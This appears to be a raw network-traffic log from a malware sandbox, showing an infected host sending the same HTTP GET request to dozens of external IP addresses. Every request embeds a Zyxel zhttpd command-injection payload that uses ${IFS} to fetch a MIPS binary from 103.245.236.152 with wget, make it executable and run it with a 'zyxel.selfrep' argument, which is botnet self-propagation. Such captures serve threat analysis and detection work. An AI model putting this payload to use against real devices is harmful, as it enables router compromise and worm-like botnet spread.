                                          Jan 14, 2024 15:46:21.099111080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5520192.168.2.2350428126.158.226.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099144936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5521192.168.2.2352098129.83.172.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099144936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5522192.168.2.2347240174.201.254.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099191904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5523192.168.2.234787042.127.58.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099211931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5524192.168.2.2333012116.71.125.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099241972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5525192.168.2.2357244153.226.102.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099277020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5526192.168.2.2342040140.91.207.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099278927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5527192.168.2.2358132104.162.176.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099332094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5528192.168.2.234554688.140.9.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099354029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5529192.168.2.2334844220.183.128.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099378109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5530192.168.2.2359700122.203.33.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099420071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5531192.168.2.235392843.93.90.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099455118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5532192.168.2.2345496184.170.156.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099503994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5533192.168.2.2354944114.81.20.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099509954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5534192.168.2.235664298.59.19.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099530935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5535192.168.2.234408858.76.247.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099565029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5536192.168.2.235838290.39.239.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099622965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5537192.168.2.2352728116.58.186.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099638939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5538192.168.2.2357520103.119.27.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099652052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5539192.168.2.2338148169.127.59.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099710941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5540192.168.2.2343476209.101.178.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099726915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5541192.168.2.2345740222.238.206.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099751949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5542192.168.2.234298666.1.74.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099785089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5543192.168.2.2355386195.209.40.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099818945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5544192.168.2.234227414.209.236.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099859953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5545192.168.2.2349970190.231.118.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099898100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5546192.168.2.233960451.221.104.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099936962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5547192.168.2.235675491.156.165.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099966049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5548192.168.2.2354118154.137.242.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099976063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5549192.168.2.2360718124.255.133.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100004911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5550192.168.2.2332952142.36.174.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100020885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5551192.168.2.2338338179.160.77.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100053072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5552192.168.2.2341768222.74.186.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100085974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5553192.168.2.233515617.199.24.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100090027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5554192.168.2.235544412.7.169.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100126028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5555192.168.2.2341934185.233.252.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100131989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5556192.168.2.2350368132.229.74.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100200891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5557192.168.2.2341740216.99.42.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100210905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5558192.168.2.2339398139.131.239.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100217104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5559192.168.2.2338988139.82.226.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100253105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5560192.168.2.23453122.40.215.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100284100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5561192.168.2.2332900128.216.238.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100306988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5562192.168.2.2337390196.177.113.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100322962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5563192.168.2.2346232172.86.72.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100356102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5564192.168.2.234149057.103.249.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100380898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5565192.168.2.235178482.172.20.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100413084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5566192.168.2.2344162130.201.135.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100445986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5567192.168.2.234081682.45.159.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100485086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5568192.168.2.233768297.77.139.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100502968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5569192.168.2.2341492201.183.33.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100532055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5570192.168.2.2354272179.195.237.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100579023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5571192.168.2.235343471.88.227.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100614071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5572192.168.2.2338728162.205.211.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100636005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5573192.168.2.235301012.89.172.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100678921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5574192.168.2.234012413.20.96.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100720882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5575192.168.2.233316875.200.148.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100749016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5576192.168.2.2360930168.52.153.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100766897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5577192.168.2.2345466216.31.23.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100820065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5578192.168.2.233779266.115.222.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100826979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5579192.168.2.234878013.19.143.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100884914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5580192.168.2.2355282157.217.44.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100909948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5581192.168.2.235348069.95.106.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.100918055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5582192.168.2.233912412.146.228.86443
                                          TimestampBytes transferredDirectionData
